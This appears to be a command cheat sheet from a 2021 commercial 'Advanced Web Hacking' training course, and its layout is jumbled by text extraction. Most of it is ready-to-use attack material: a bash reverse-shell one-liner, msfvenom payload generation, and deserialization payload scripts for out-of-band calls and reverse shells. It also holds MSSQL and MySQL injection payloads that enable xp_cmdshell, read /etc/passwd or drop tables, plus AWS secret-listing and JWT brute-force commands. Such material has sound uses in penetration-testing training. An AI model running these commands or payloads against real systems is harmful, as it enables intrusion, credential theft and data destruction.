Advanced Web Hacking

Command
Cheat Sheet
NSS Training – Command Cheat Sheet

Command Cheat Sheet

Useful commands for Web Hacking Black Belt Edition
Note: All the required tools are installed in the path or in the directory /root/tools

Common Commands
$ burpsuite Start Burp from command line

$ sudo tcpdump -n udp port [port no] | grep

Start a UDP packet listener
'subdomain.domain.com'

$ sudo tcpdump -vvv -n port [port no] Start a packet listener

$ nc –lnvp <port> Netcat listener

$ bash -i >& /dev/tcp/<Listener_IP>/<PORT> 0>&1 Bash one-line reverse Shell

Load the file in vim editor

$ vim [filename]
Input ‘i’ to insert text

Input [esc]:wq to save and quit vim

$ wget http[s]://website/url Download a file

Additional commands
./hash_extender --data [data] --secret-min [min-
Generate hashes of different
len] --secret-max [max-len] --append [value] --
lengths to perform hash length
signature [signature] --format [type] --out-data-
extension attack
format [type] --table

Start XXEServ over HTTP and FTP

./xxeserv -w
channel

java -jar [filename.jar] Execute the jar file

Creates a payload for PHP Slim

./phpggc -b slim/rce1 <function> <parameter>
framework to execute RCE

git clone [git_url.git] Download the source from git

Page | 1

©
Claranet Cyber Security 2021. All rights reserved
NSS Training – Command Cheat Sheet

Compile code using maven and

mvn clean package -DskipTests
package it to jar file

Python Commands
python pythonserv.py / pythonserv Runs the pythonserv script

python3 brute-jwt.py --file (Dictionary path) -- Runs the brute-jwt script along
algorithm (algorithm type) --token (token string) with its parameters

Python2: python -m SimpleHTTPServer [port no] Starts a webserver on specified

Python3: python3 -m http.server [port no] port number.

Python3: aws_enum.py --access-key (Key) --secret-

Runs an AWS script and gives
key (Secret Key) --session-token (Token Value) --
access detils over a cloud instance.
region (Region)

Python3: coupon.py (MobileCarrier) (Discount) Runs discount coupon script

Creates signatures for discount

Python3: coupon_request_sig.py (coupon.txt) (id)
coupons

Creates a python serialized payload

Python3: python_deser_oob.py <userdomain> for making an OOB call to a
specified domain.

Creates a python serialized payload

Python3: python_deser_shell.py
for reverse shell.

Create a python serialized payload

python3 GeneratePayload.py [command] [dict_file]
in dictionary file.

Exploit the python serialization to

python3 ExecutePaylaod.py <plex_server_url:port>
execute the command generated
[myPlexToken] [dict_file]
using “GeneratePayload.py”

NMAP
Full Port, no DNS, basic scripts,
# nmap -sV -A –p- -nvvv [host]
version finger print and verbose

# nmap -iL <infile> -oA <outfile> [host] Input and output files

Page | 2

©
Claranet Cyber Security 2021. All rights reserved
NSS Training – Command Cheat Sheet

# nmap -p88 --script=<scriptname> --script-args

Nmap scripts with arguments
arg1='value' [host]

Metasploit
# msfconsole Launch Metasploit console

> use <module_name> Use an exploit / auxiliary

> set <parameter_name> <parameter_value> Set parameters

> set payload <payload_name> Set payload

> run/exploit Execute module

# msfconsole -x "use <module_name>; set Run a module without going into

<parameter_name> <parameter_value>; run; exit" console

# msfvenom -p <payload_name>
Generate a payload using
LHOST=<local_host_IP> LPORT=<local_port> -f
msfvenom
<file_format> > filename.extention

ENCODE/DECODE Commands
$ echo "test" | base64 Encode → Text to Base64

$ echo "<HEX>" | xxd -r -p Encode → Hex to Bytes

$ echo "<base64data>" | base64 -d Decode → Base64 to Bytes

$ echo "<Bytes>" | xxd -p Decode → Bytes to Hex

Commonly Used Out Of Band (OOB) Commands

> ping <IP/Domain> ICMP/DNS Request

> nslookup <Domain> DNS Request

> nslookup <Domain> <Resolver_IP> DNS Request via Specific Resolver

Send a TCP/UDP request using

> nc/ncat <IP> <Port>
Netcat/Ncat

Send a HTTP/HTTPS request using

> certutil -urlcache -split -f <URL>
certutil [Windows Only]

Page | 3

©
Claranet Cyber Security 2021. All rights reserved
NSS Training – Command Cheat Sheet

Send a HTTP/HTTPS request using

> powershell Invoke-WebRequest -Uri <URL>
powershell [Windows Only]

Commonly Used SQL Injection Payloads (MSSQL Server)

> 1' or '1'='1' -- Authentication bypass

> ' waitfor delay '0:0:10' -- Sleep for 10 seconds

> ' UNION SELECT NULL,TABLE_NAME,NULL FROM

Extract table names
information_schema.TABLES--

> ';exec master..xp_dirtree Execute an OOB call to the

'\\userX.webhacklab.com\' -- mentioned target (stacked query)

> ';EXEC sp_configure 'show advanced options',

Enable xp_cmdshell (stacked
1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',
query)
1;RECONFIGURE; --

> ';exec master..xp_cmdshell '(Windows Terminal Execute terminal command via

Com)' -- xp_cmdshell (stacked query)

Commonly Used SQL Injection Payloads (MYSQL Server)

> 1' OR '1'='1' # Authentication bypass

> ' UNION ALL SELECT LOAD_FILE('/etc/passwd') # Read contents of a File

> -@@version
MYSQL Server version Details
> UNION ALL SELECT NULL,version() #

> AND sleep(10) # Sleep for 10 seconds

>2100935' OR Time Based Injection incase DB

IF(MID(@@version,1,1)='5',sleep(1),1)='2 version matches ‘5’

> DROP sampletable;# Drops table from DB (dangerous)

Page | 4

©
Claranet Cyber Security 2021. All rights reserved
NSS Training – Command Cheat Sheet

Commonly used Cloud CLI Commands ( AWS, AZURE)

> aws s3 ls List S3 Buckets

> aws s3 cp <source> <destination> --recursive Recursive Copy s3 Buckets

> az storage share exists --account-name (account Verifies and tells if there is a
name) --account-key (account key) --name (name) storage server share available.

>az storage file download-batch --account-name

(Account name) --account-key (Account Key) -- Downloads the files from the
destination (destination path) --source (source storage space to local path.
name) --no-progress

>aws cognito-idp sign-up --client-id (client id)

--username (username) --password (password) -- Registers a user via cognito-idp
user-attributes Name="email",Value="(emailid)" with the mentioned details.
Name="name",Value="(name)"

>aws cognito-idp confirm-sign-up --client-id

Sends the registration code to
(clientid) --username=(username) --confirmation-
activate the cognito-idp user.
code (code)

>aws secretsmanager list-secrets Lists aws secretmanager secrets

>aws cognito-identity get-id --identity-pool-id

(identity pool id) --logins Generates an authenticated
(IdentityPoolName)=(IdToken)) Cognito identity

>aws cognito-identity get-credentials-for-

Creates temporary AWS
identity --identity-id (IdentityID) --logins
credentials
(IdentityPoolName)=(Id Token)

Fetches the details of the

>aws secretsmanager get-secret-value --secret-id
mentioned secret id via secret
(secretid)
manager

Commonly used Sqlmap Commands

sqlmap -r (Request file) --dbms (Database type) -
Sqlmap command to test for
-second-order (path to look as payload reflection
second order SQL injection
point) --dbs

Page | 5

©
Claranet Cyber Security 2021. All rights reserved
NSS Training – Command Cheat Sheet

Sqlmap command to edit a value

sqlmap -r (Request file) --eval=(Eval script) --
corresponding to a request at
dbs --batch
runtime.

Page | 6

©
Claranet Cyber Security 2021. All rights reserved